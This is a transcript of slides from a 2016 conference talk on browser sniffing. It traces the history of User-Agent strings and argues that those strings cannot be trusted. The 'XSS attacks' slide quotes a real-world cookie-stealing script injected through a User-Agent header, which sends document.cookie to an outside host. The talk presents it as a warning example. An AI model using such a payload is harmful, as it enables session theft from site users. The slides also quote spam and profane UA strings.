A presentation at NLHTML5 in in Enschede, Netherlands by Niels Leenheer
everybody lies NLHTML5 @ Nerds & Company, March 17th 2016
yes, this talk is about browser sniffing
why a talk about browser sniffing?
browser sniffing is dirty
you should use feature detection
why a talk about browser sniffing?
what is browser sniffing?
The HTTP specification defines the User-Agent header. It contains a string with information about the browser.
Every request the browser makes to the server includes the User-Agent header
GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net
GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>
You can access the exact same string using JavaScript
You can use the User-Agent string to identify: the browser the rendering engine the operating system the device model and more
why browser sniffing is hard
things started out simple
Mosaic Mosaic/1.0 (Win3.1) The name of the browser The version of the browser Operating system
Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system
but it quickly started to get complicated
Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system
Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption
Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 The name of the browser The version of the browser Rendering engine
Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10 The name of the browser Fake version of the browser Real version of the browser
Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12 The name of the rendering engine The name of the browser Build date of the rendering engine Version of the browser Version of the rendering engine
Firefox Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0 Build date is no longer updated
Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
and it gets worse…
Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser
Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser
Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser
Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser
Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser
and those were all relatively normal User-Agent strings
“User-Agent strings only get larger over time, never smaller” Niels’s second law of User-Agent strings
Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser
Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
LG Netcast Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+
Sometimes browsers include a compatibility mode, or desktop mode which deliberately changes the User-Agent string
Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser
Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser
Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version
Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9
And it is possible to change the User-Agent string yourself
spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)
XSS attacks
<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>XSS attacks
funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°
angry people
angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.
4 x balls 82 x fuck 9 x dick 1.000.000 unique useragent strings 6 x ass 10 x shit 3 x vagina 108 x sex
User-Agent strings cannot be trusted!
Everybody lies
you should never use browser sniffing for controlling access to your website
you should never use browser sniffing for determining browser capabilities
you should never build your own browser sniffing library
what is browser sniffing good for?
improve ux if you know the platform or browser, you can streamline the user experience
analytics if you know your users, you can build a better site for them
error logging if you know which browser is causing problems, you can fix them
Use a browser sniffing library that is regularly updated. And check if it is possible to automatically schedule updates.
Try libraries like UAParser, PiwikDeviceDetector or WhichBrowser https://github.com/ua-parser https://github.com/piwik/device-detector https://github.com/whichbrowser
Please don’t use WURLF because it is outdated and just not good
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler
Thank you!
Thank you!
This is talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.
